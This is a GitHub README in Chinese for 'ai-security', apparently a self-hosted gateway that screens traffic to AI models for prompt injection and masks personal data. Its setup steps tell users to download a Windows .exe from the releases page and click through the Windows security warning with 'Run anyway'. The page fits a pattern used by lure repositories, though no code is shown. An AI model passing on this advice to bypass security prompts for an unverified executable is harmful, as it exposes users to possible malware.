Hipporegiusillyria669/ai-security

GitHub: Hipporegiusillyria669/ai-security

一个自托管的 OpenAI 兼容 API 网关,为生成式 AI 应用提供流量监控、安全防护、数据脱敏与成本控制能力。

Stars: 0 | Forks: 0

# 🛡️ ai-security - 轻松保护您的人工智能代理 [![](https://img.shields.io/badge/Download-Latest_Release-blue.svg)](https://github.com/Hipporegiusillyria669/ai-security/releases) ## 📖 关于本软件 ai-security 保障您的 AI 应用安全。它会检查您的工具与 AI 语言模型之间的通信。该软件会拦截恶意输入,并通过过滤敏感数据来保护隐私。它通过缓存重复请求来节省资金。它就像一面盾牌,保护您的业务应用程序。 此工具兼容多种 AI 模型。它能整理您的代理流量,监控交互过程,并拦截诸如 prompt injection 之类的威胁。它确保您的 AI 按预期行为运行。您将其托管在自己的硬件上,从而使您的数据完全掌握在自己手中。 ## 💻 系统要求 您的计算机需要满足以下条件才能运行 ai-security: * 操作系统:Windows 10 或 Windows 11。 * 内存:4 GB RAM。 * 存储空间:200 MB 磁盘空间。 * 网络:初始设置时需要有效的互联网连接。 ## 🚀 设置指南 请按照以下步骤启动您的 gateway。 ### 1. 下载文件 访问此链接,为您的计算机选择合适的文件:[https://github.com/Hipporegiusillyria669/ai-security/releases](https://github.com/Hipporegiusillyria669/ai-security/releases)。 在最新版本发布的“Assets”部分下,找到以 `.exe` 结尾的文件。点击文件名即可开始下载。 ### 2. 准备文件夹 在您的桌面上新建一个文件夹,将其命名为 `ai-security`。将下载好的文件移动到该文件夹中。 ### 3. 运行安装程序 双击您下载的文件。Windows 可能会显示安全提示。点击“更多信息”,然后点击“仍要运行”。接下来会打开一个窗口,该窗口会在后台处理您的安全 gateway 相关工作。在使用 AI 应用程序时,请保持此窗口处于打开状态。 ### 4. 调整 AI 设置 您的 AI 软件会通过此 gateway 发送消息。请更新您的 AI 应用设置,使其指向 gateway 地址。在应用程序设置中,使用 `http://localhost:8080` 作为您的 proxy 或 gateway URL。 ## ⚙️ 工作原理 该软件充当中间人的角色。您的应用程序将请求发送到 gateway,而不是直接发送给 AI 提供商。gateway 会检查消息,并根据您定义的规则进行验证。如果消息通过检查,gateway 会将其发送给 AI。随后,AI 返回响应。gateway 会检查该响应的安全性,然后将干净的数据返回给您的应用程序。 ## 🛡️ 安全特性 * Guardrails:定义规则,限制您的 AI 可以表达的内容或执行的操作。 * Data Masking:在数据到达 AI 之前,移除姓名或电子邮件等个人详细信息。 * Threat Detection:阻止攻击者欺骗 AI 模型。 * Audit Logs:保留所有交互记录。 * Cost Control:防止向昂贵的 AI 模型发送不必要的请求。 ## 🛠️ 配置说明 您可以通过编辑 `ai-security` 文件夹中的 `config.yaml` 文件来更改软件的运行方式。请使用记事本等基础文本编辑器打开此文件。 如果 8080 端口已被占用,您可以更改 `port` 端口号。启用日志可以查看软件拦截了哪些内容。保存文件并重启应用程序以应用更改。 ## 🔍 常见问题 **此软件会存储我的数据吗?** 不会。该软件在您的计算机上本地运行。它会实时处理数据,除非您主动开启日志记录,否则不会保存您的对话内容。 **这会使我的 AI 变慢吗?** 对速度的影响非常小。该软件执行检查的时间仅需几毫秒。 **这适合业务使用吗?** 适合。由您自行托管 gateway,没有任何第三方能看到您的流量。 **如果 gateway 关闭会怎样?** 您的 AI 应用将失去与模型的连接。只需重启应用程序即可恢复服务。 ## 📄 许可证和条款 本项目使用开源许可证。您可以在发布版本中提供的 LICENSE 文件中查看相关条款。您有权出于自身需求运行、检查和修改代码。 关键词:agentic-ai, agentic-identity, agentic-security, ai-agents, ai-gateway, ai-governance, ai-security, generative-ai, guardrails, hallucination-evaluation, llm, llm-cost-optimization, llm-gateway, mcp, model-routing, openai-compatible, opentelemetry, prompt-injection, self-hosted, semantic-cache
标签:AI安全, API网关, Chat Copilot, EVTX分析, 提示词注入防御, 数据隐私, 流量监控, 用户代理